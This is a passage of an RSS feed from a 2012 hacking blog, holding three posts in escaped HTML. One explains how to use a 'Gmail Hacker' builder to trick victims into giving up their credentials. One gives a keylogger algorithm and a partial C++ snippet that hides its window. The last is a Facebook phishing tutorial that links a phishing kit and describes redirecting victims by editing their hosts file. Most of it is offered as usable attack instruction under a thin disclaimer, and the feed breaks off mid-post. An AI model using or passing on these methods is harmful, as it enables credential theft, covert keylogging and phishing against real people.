&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
These are some of my favourite movies share yours &lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://lh4.googleusercontent.com/-J7_LX4nUNWQ/TrNPAhg6qhI/AAAAAAAAAC8/Knhb0-aLnZI/s72-c/italian-job.jpg" width="72"/></item><item><title>Gmail Hacker | Fake Tool to Hack Gmail Accounts</title><link>http://superhackings.blogspot.com/2012/09/gmail-hacker-fake-tool-to-hack-gmail.html</link><category>Computer Security</category><category>Gmail Hacks .Email Hacking</category><category>Hacking Tutorials</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 15 Sep 2012 13:21:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-5500705101614649947</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
Hey friends, today i am going to disclose some irony stuff that &lt;b&gt;Hackers &lt;/b&gt;nowadays using to make people fool these days. Hackers are spreading a software tool named as &lt;b&gt;Gmail Hacker v1.0&lt;/b&gt; on the internet with title&lt;b&gt; " Hack Gmail Accounts using Gmail Hacker" &lt;/b&gt;or &lt;b&gt;"Gmail Hacker : A superb Gmail Account &lt;span class="IL_AD" id="IL_AD11"&gt;Hacking tool&lt;/span&gt;"&lt;/b&gt;. But beware of such articles because its nothing more than a smart keylogger which is actually intended to hack users credentials that user gonna use to hack somebody's gmail account. Let us discuss the process &lt;span class="IL_AD" id="IL_AD12"&gt;in detail&lt;/span&gt;:

&lt;br /&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
First of all frankly speaking, &lt;b&gt;Gmail Hacker&lt;/b&gt; is a hacking tool( or i better call it social engineering hacking tool) which can be used in either way like Hacking someone's Gmail account and at same time loosing your Gmail Account( if not handled with extreme care). So friends which process you all wanna learn first. Hacking one or getting Hacked one.. or both at same time going step by step :P.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
For Having a trail of Gmail Hacker tool you gonna need below stuff:&lt;/div&gt;
&lt;ul style="font-family: Verdana,sans-serif;"&gt;
&lt;li&gt;&lt;a href="http://www.microsoft.com/net/"&gt;Download .Net Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.box.com/shared/umyhk6i5ks"&gt;Gmail hacker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Winrar (In order to extract the files)&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Now lets go step by step for the Hacking procedure:&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Gmail Hacker for Hacking Gmail Accounts:&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Step 1 -&lt;/b&gt; Extract the arhive named Gmail.rar &lt;span class="IL_AD" id="IL_AD4"&gt;on your computer&lt;/span&gt;, Once you have extracted you will see the following file:&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Builder.exe &lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Step 2 - &lt;/b&gt;On opening&amp;nbsp;&lt;b&gt;Gmail hacker builder.exe &lt;/b&gt;you will see the following:&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; font-family: Verdana,sans-serif; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDsyKCswVNQSJphA4_H0vXjV5jrS-iIHs4HJrRaqNGJG1fYRYNCnZHsmiH4fubqZPIj5hif_dMANDBr1odkOHDtDuJrIvfWVYP46omTpkARWftEk2tlkiLiyPtVSzZXjc24ssAgLjr05c/s1600/4115378636_7a99b4ff35+%281%29.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDsyKCswVNQSJphA4_H0vXjV5jrS-iIHs4HJrRaqNGJG1fYRYNCnZHsmiH4fubqZPIj5hif_dMANDBr1odkOHDtDuJrIvfWVYP46omTpkARWftEk2tlkiLiyPtVSzZXjc24ssAgLjr05c/s1600/4115378636_7a99b4ff35+%281%29.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Step 3 - &lt;/b&gt;Next you need to enter your gmail address where you would receive logs. &lt;b&gt;However I would recommend you to create a &lt;span style="color: blue; font-family: inherit ! important; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;fake &lt;/span&gt;&lt;span class="kLink" style="color: blue ! important; font-size: inherit ! important; font-weight: inherit ! important; position: static;"&gt;email&lt;/span&gt;&lt;/span&gt; address and use it for receiving logs.&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Step 4 - &lt;/b&gt;Once you have entered your credentials, click on the&lt;b&gt; build &lt;/b&gt;button.&amp;nbsp;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Step 5 -&lt;/b&gt; A file named&lt;b&gt; gmailhacker.exe&lt;/b&gt; would be created, On executing the file, the victim will see the following:&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; font-family: Verdana,sans-serif; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwm-eYo_1Uifoak2WfD92Pyz3c3Vw6TY_Xg3iUrvWHA5HjMMy0WaRQX3n9qd2IY5jBCkBOlH5XLjfY1oxmoV1sfZT8s99bwN0ceVO-y9FOiHR_tFtdCL7-4nBfG89jrct2zFQEdvliSTE/s1600/4115378760_a2e79f5773.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwm-eYo_1Uifoak2WfD92Pyz3c3Vw6TY_Xg3iUrvWHA5HjMMy0WaRQX3n9qd2IY5jBCkBOlH5XLjfY1oxmoV1sfZT8s99bwN0ceVO-y9FOiHR_tFtdCL7-4nBfG89jrct2zFQEdvliSTE/s1600/4115378760_a2e79f5773.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Now you need &lt;span class="IL_AD" id="IL_AD3"&gt;to apply&lt;/span&gt; your social engineering skills in order to make 
the victim enter his/her credentials on to the software. The simplest 
way of accomplishing this is to tell the victim that the application &lt;b&gt;Gmailhacker.exe&lt;/b&gt; is itself a &lt;b&gt;gmail &lt;span class="IL_AD" id="IL_AD6"&gt;hacking software&lt;/span&gt;&lt;/b&gt;,
 You just need to the victim's username, your own gmail ID and your own 
gmail password, where you would receive victims passwords and click&lt;b&gt; "Hack Them"&lt;/b&gt;.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Step 6 - &lt;/b&gt;Once the victim clicks on the &lt;b&gt;"Hack Them" &lt;/b&gt;button, his own gmail credentials that he entered would be sent to you on the email you typed while configuring the software.&amp;nbsp;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Well, here is an interesting part, when the victim will click on the button &lt;b&gt;"Hack them"&lt;/b&gt;, he will receive the following error, making him thinking that their is a problem with the software:&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; font-family: Verdana,sans-serif; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVJHRz4MJmxTf6409hPCbIpRrVzogUKyGRgMbWhVk8mRQh28horQW1QYGqPT6j9Rm2rqSWKODePsDWWQQZL_VGqfDNNre9_KqM3r30L6Kl5gd44F5OohP2cQeBjlOiqUCHmGtw0gF1jpM/s1600/4115386436_1acebf90b6.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVJHRz4MJmxTf6409hPCbIpRrVzogUKyGRgMbWhVk8mRQh28horQW1QYGqPT6j9Rm2rqSWKODePsDWWQQZL_VGqfDNNre9_KqM3r30L6Kl5gd44F5OohP2cQeBjlOiqUCHmGtw0gF1jpM/s1600/4115386436_1acebf90b6.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Now i hope you all understood which part you need to provide credentials and which part you need to provide the fake account credentials that you have recently created.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Irony Part : &lt;/b&gt;The file that is being generated by builder.exe i.e. Gmail Hacker.exe is a advance type of remote keylogger which will sent the credentials you have entered into the Gmail Hacker option menu to the hacker who has build the Gmail Hacker.&lt;span class="IL_AD" id="IL_AD10"&gt;exe file&lt;/span&gt;. So important part never put your original account credential in any of such tools which gurantees that they can &lt;span class="IL_AD" id="IL_AD8"&gt;hack email&lt;/span&gt; accounts or &lt;span class="IL_AD" id="IL_AD1"&gt;facebook&lt;/span&gt; accounts because all are simply fake. They are just cool social engineering stuff which is used to make newbie Hackers or users fool to hacker their Gmail accounts.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
If you have any doubts ask me in form of comments.&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDsyKCswVNQSJphA4_H0vXjV5jrS-iIHs4HJrRaqNGJG1fYRYNCnZHsmiH4fubqZPIj5hif_dMANDBr1odkOHDtDuJrIvfWVYP46omTpkARWftEk2tlkiLiyPtVSzZXjc24ssAgLjr05c/s72-c/4115378636_7a99b4ff35+%281%29.jpg" width="72"/></item><item><title>How to code keylogger in C programming Language</title><link>http://superhackings.blogspot.com/2012/09/how-to-code-keylogger-in-c-programming.html</link><category>Hacking Tools And Programs</category><category>INTERESTING TRICKS</category><category>Keylogger</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 15 Sep 2012 13:19:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-3878492318783936681</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;&lt;/div&gt;
How to code keylogger in &lt;span class="IL_AD" id="IL_AD6"&gt;C programming language&lt;/span&gt; : C codechamp has brought you a detailed &lt;span class="IL_AD" id="IL_AD11"&gt;tutorial&lt;/span&gt; on &lt;span class="IL_AD" id="IL_AD3"&gt;how to write&lt;/span&gt; a Keylogger code in C programming. &lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;C program of Keylogger or &lt;span class="IL_AD" id="IL_AD2"&gt;keystroke logger&lt;/span&gt;&lt;/b&gt; :&amp;nbsp; &lt;b&gt;Keylogger&lt;/b&gt;

 is a &lt;span class="IL_AD" id="IL_AD4"&gt;computer&lt;/span&gt; program which captures all &lt;span class="IL_AD" id="IL_AD7"&gt;the key&lt;/span&gt; strokes pressed by 
user in real time. It captures all the keys and write them to some file 
say log.txt and stores it on computer hard disk. Now sending these logs 
to emails or FTP address depends upon the type of keylogger that is 
keylogger is &lt;span class="IL_AD" id="IL_AD8"&gt;remote keylogger&lt;/span&gt; or&lt;b&gt; physical keylogger&lt;/b&gt;. 
Physical &lt;span class="IL_AD" id="IL_AD5"&gt;keyloggers&lt;/span&gt; are useful when you have physical access to that 
system and can retrieve logs personally. While remote keyloggers can be 
used from anywhere in the world, the only requirement is that victim 
must have internet connection. Today we &lt;span class="IL_AD" id="IL_AD10"&gt;will be writing&lt;/span&gt; a &lt;b&gt;C program of Physical keylogger&lt;/b&gt; or &lt;b&gt;Keystroke logger&lt;/b&gt;

 which requires physical access of the system. We will be extending our 
logic in further programs to make it remote keylogger which sends logs 
to FTP’s and Emails directly. So first of all lets see how simple 
keylogger program works…&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Verdana,sans-serif; margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzuxQdrHe1ERFnGFHymTmzb3erdI-6P0MomMsGidt8Tqpo5_Tqpn5m9W0Yuz9JBw2U43U-fF_rS9PeXjusGWwuOTgoWM_Uf9VqZYchtIcL-xU7L1NeCyN3-mxNct6lZ-VrkdbIADgvXuo/s1600/make-emoticons-facebook.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzuxQdrHe1ERFnGFHymTmzb3erdI-6P0MomMsGidt8Tqpo5_Tqpn5m9W0Yuz9JBw2U43U-fF_rS9PeXjusGWwuOTgoWM_Uf9VqZYchtIcL-xU7L1NeCyN3-mxNct6lZ-VrkdbIADgvXuo/s320/make-emoticons-facebook.jpg" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;C program of Keylogger or Keystroke logger&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;Algorithm for writing a Simple Keylogger&lt;/b&gt; :&lt;/div&gt;
&lt;blockquote style="font-family: Verdana,sans-serif;"&gt;
1. Create an Empty log file for storing keylogs.&lt;br /&gt;
2. Intercept keys pressed by user using&amp;nbsp;GetAsyncKeyState() function.&lt;br /&gt;
3.&amp;nbsp; Store these intercepted values in file.&lt;br /&gt;
4.&amp;nbsp; Hide the Running Window Dialog to make it undetectable.&lt;br /&gt;
5.&amp;nbsp; Use while loop to make it running in all conditions.&lt;br /&gt;
6.&amp;nbsp; Add Sleep() function to reduce the CPU usage to 0%.&lt;/blockquote&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Now let us see &lt;span class="IL_AD" id="IL_AD9"&gt;the C program&lt;/span&gt; of keylogger or keystroke logger which 
intercepts all the keys pressed by the user and store these pressed keys
 in log file.&lt;/div&gt;
&lt;div style="background-color: white; border: medium none; color: black; font-family: Verdana,sans-serif; overflow: hidden; text-align: left; text-decoration: none;"&gt;
&lt;br /&gt;
C program of Keylogger or keystroke logger :&lt;/div&gt;
&lt;blockquote class="tr_bq" style="font-family: Verdana,sans-serif;"&gt;
&lt;div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;
&lt;pre&gt;#include&amp;lt;iostream&amp;gt;
#include&amp;lt;windows.h&amp;gt;
#include&amp;lt;fstream&amp;gt;
#include&amp;lt;time.h&amp;gt;
using namespace std;

int main()
{
 bool runlogger = true;
 ofstream log;
 //where your logs will be stored
 log.open("C:\\log.txt", ofstream::out);
 //displaying error message when unable to open file
 if(log.fail())
  {
   printf("Error in opening log.txt file\n");
   }
  //Code for hiding running dialog
  HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
  ShowWindow(hideIt,0);
  //Logic for capturing keystokes ........
  ...................
&lt;/pre&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
To view the complete C program visit my &lt;span class="IL_AD" id="IL_AD1"&gt;website&lt;/span&gt; on C programming :&lt;/div&gt;
&lt;h1 style="font-family: Verdana,sans-serif;"&gt;
&lt;a href="http://www.ccodechamp.com/c-program-of-keylogger-or-keystroke-logger-c-codechamp/" target="_blank"&gt;C program of Keylogger or keystroke logger | C codechamp&lt;/a&gt;&lt;/h1&gt;
&lt;h1 style="font-family: Verdana,sans-serif;"&gt;
&amp;nbsp;&lt;span style="font-size: small;"&gt;Bookmark my website for Learning C programming like champs.&lt;/span&gt;&lt;/h1&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzuxQdrHe1ERFnGFHymTmzb3erdI-6P0MomMsGidt8Tqpo5_Tqpn5m9W0Yuz9JBw2U43U-fF_rS9PeXjusGWwuOTgoWM_Uf9VqZYchtIcL-xU7L1NeCyN3-mxNct6lZ-VrkdbIADgvXuo/s72-c/make-emoticons-facebook.jpg" width="72"/></item><item><title>How to Hack Facebook account or password</title><link>http://superhackings.blogspot.com/2012/09/facebook-is-becoming-secured-day-by-day.html</link><category>Facebook Hack</category><author>noreply@blogger.com (Megh Singh Jodha)</author><pubDate>Sat, 15 Sep 2012 13:16:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-2055989097824833615.post-1102903131796175734</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;b&gt;Facebook&lt;/b&gt; is becoming secured day by day, it daily fixes several bugs found by users. Recently we have noticed that it has also tried to fix the Phishing loophole by validating the previous URL from which the user is arriving to Facebook. It validates from which source user is arriving on &lt;span class="IL_AD" id="IL_AD7"&gt;Facebook and&lt;/span&gt; hence if its a &lt;b&gt;fake &lt;span class="IL_AD" id="IL_AD8"&gt;Facebook Page&lt;/span&gt;&lt;/b&gt;, it warns its users that Please Change your Password Immediately as you might be a victim of &lt;b&gt;Phishing&lt;/b&gt;. This validation made &lt;b&gt;Facebook account passwords&lt;/b&gt; secured from thousands of Novice and &lt;b&gt;Script Kiddie Hackers&lt;/b&gt; but L33T&amp;nbsp; still can't be stopped, as L33Ts never stop, they keep on moving to new alternatives.

&lt;br /&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
So we moved to &lt;b&gt;advanced mode of Phishing&lt;/b&gt; like &lt;b&gt;Tabnabbing&lt;/b&gt;, meta refresh trick, browser side bypassing and even manipulating host(hint is sufficient as i will not disclose this one)..when i feel bored i use this technique to hack accounts and passwords of Facebook. Just try to figure out what we can do using Host File :P ..Not going to tell more than that...&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Ok.... Ok... Lets learn today the technique called &lt;b&gt;Host Name IP mapped based Phishing&lt;/b&gt;. You all will be really happy to know that i have written my third white paper on the same topic and you will be more than happy by knowing that this technique of Phishing is invented by Lokesh Singh (:P none other than me...).. So friends lets start our tutorial.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDdodzphCnGx616iNOZ6mA7mDvxBbFAIVMHp_5jgZQHJ_1HovpvUHIpnTmw83g2gheEUASBNC_GZs9GLoryCWUPTYL861OGJo1o32Pnoar0VmnVRu5NMZzJaY6EJ23fPWvcq6k2YRhyphenhyphenoMo/s1600/Hackfacebook.jpeg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img alt="hack facebook account password, hacking facebook accounts" border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDdodzphCnGx616iNOZ6mA7mDvxBbFAIVMHp_5jgZQHJ_1HovpvUHIpnTmw83g2gheEUASBNC_GZs9GLoryCWUPTYL861OGJo1o32Pnoar0VmnVRu5NMZzJaY6EJ23fPWvcq6k2YRhyphenhyphenoMo/s400/Hackfacebook.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;How to &lt;span class="IL_AD" id="IL_AD3"&gt;hack Facebook account&lt;/span&gt; and passwords&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;
&lt;div style="font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;
&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Note: This is for Educational Purposes only. Don't misuse it.:P Please...&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: Verdana,sans-serif;"&gt;
&lt;u&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Requirements:&lt;/b&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
1. Facebook latest Phisher or Fake Pages.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Download Latest Facebook Phisher here: &lt;b&gt;&lt;a href="http://www.mediafire.com/?1kjertebk6j3815"&gt;Download Now&lt;/a&gt;&lt;/b&gt; &lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
2. &lt;span class="IL_AD" id="IL_AD1"&gt;Free Web hosting&lt;/span&gt; server to upload those Phish Pages.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
3. Spoofing URL using Host name mapping technique.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Let me provide you little background what i will teach you today. I know most of you already know phishing but for first timers, let me explain a bit. Phish Pages means &lt;b&gt;Fake Pages&lt;/b&gt; that looks absolutely similar to original pages and the technique of using those Fake pages to &lt;a href="http://www.hackingloops.com/"&gt;hack&lt;/a&gt; anyone's user name and password is called Phishing. And technique which we use to send these fake pages to victim and prompt him to believe that they are real is called&lt;b&gt; Social Engineering&lt;/b&gt;. But i think this we already know, what's new we are going to discuss today.. Ahhh... Just wait and hold your pants tight because today i will be breaking all the policies and ethical norms because until and unless we don't know how hackers do things we will never able to stand in front of them.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;
&lt;div style="color: red;"&gt;
&lt;u&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;What is New???&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
We all know that fake pages can only be detected using two techniques:&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
1. Verifying the URL in the address bar, if its a fake page then URL must be different from original one.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
2. Using any web security toolbar that warns users for fake pages like AVG toolbar, Norton &lt;span class="IL_AD" id="IL_AD10"&gt;Online security&lt;/span&gt; toolbar etc..&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
But what if you open &lt;b&gt;www.facebook.com&lt;/b&gt; manually in your &lt;span class="IL_AD" id="IL_AD11"&gt;web browser&lt;/span&gt; and fake page opens and URL in the web browser remains &lt;b&gt;www.facebook.com &lt;/b&gt;only. That means first technique to detect fake page go in vain. Now for second technique, all online web security toolbar detect fake pages by comparing the input&amp;nbsp; by user in URL address bar and original page URL. If both matches then its not a fake page else its a malware page.&amp;nbsp;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
So friends today i will teach you how to make your fake pages open whenever victim opens Facebook in his/her web browser. Ahhh... You will be now thinking its impossible. But as i have told you i have written a white paper on Advanced Phishing techniques. So its 110% possible to load fake web page whenever user opens www.facebook.com or any other &lt;span class="IL_AD" id="IL_AD5"&gt;website&lt;/span&gt; like Yahoo, Hotmail or anything... Below are the steps and video for the same.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
I had made the video as well as written the steps in detail which will tell you everything step by step.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: Verdana,sans-serif;"&gt;
&lt;u&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Steps to Hack Facebook account or Password:&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
1. Download the Latest Facebook Phisher.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
2. Extract the files, you will get below 4 files:&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;
&lt;ul style="text-align: left;"&gt;
&lt;li&gt;index.php&lt;/li&gt;
&lt;li&gt;facebook1.php&lt;/li&gt;
&lt;li&gt;passwords.html&lt;/li&gt;
&lt;li&gt;thanks.php&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
3. Now go to any free web hosting web server to upload these fake pages.&amp;nbsp;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
Note all should be uploaded at root means not in any folder. Just at first level directory.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
4. Now you need to find the correct IP address of the account you have created on &lt;span class="IL_AD" id="IL_AD2"&gt;web hosting server&lt;/span&gt;.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
5. When you get you fake page's IP address, now what we need to do is that we have to add the entry of the IP address against the www.facebook.com in victim's host file located at below location.&lt;/div&gt;
&lt;blockquote class="tr_bq" style="font-family: Verdana,sans-serif;"&gt;
&lt;b&gt;C:\Windows\System32\drivers\etc&lt;/b&gt;&lt;/blockquote&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
6. There are several ways of doing that, i have written my own php scripts for doing the same but i cannot &lt;span class="IL_AD" id="IL_AD9"&gt;share&lt;/span&gt; that with you guys because there are chances of misusing it. So i explain you the logic and rest you need to figure out how you will edit victims host file and append your Fake Page IP address against www.facebook.com.&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
7. Now after doing steps 5 and 6, whenever user open the &lt;b&gt;www.facebook.com&lt;/b&gt;, your fake Facebook page will open and victim will never be able to visit the original Facebook, so he cannot even been able to change his &lt;b&gt;password&lt;/b&gt;...:P&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
8. I have added an extra logic to my scripts, whenever victim enter the password and hit enter button, i am removing the entry of Fake IP address against www.facebook.com from the host file by making it spaces. So it will be for him for one time only which sounds more spoofed. Its just a single line code but i cannot tell you guys because it will make this article completely unethical.&amp;nbsp;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
I will teach you techniques but i will not do spoon feeding because if you want to become good hacker then you need to use your brain too. I love to be called Destructive but i do constructive works..:P like this one...rofl...&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
9. Everything other than this is similar to normal phishing technique..&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: Verdana,sans-serif;"&gt;
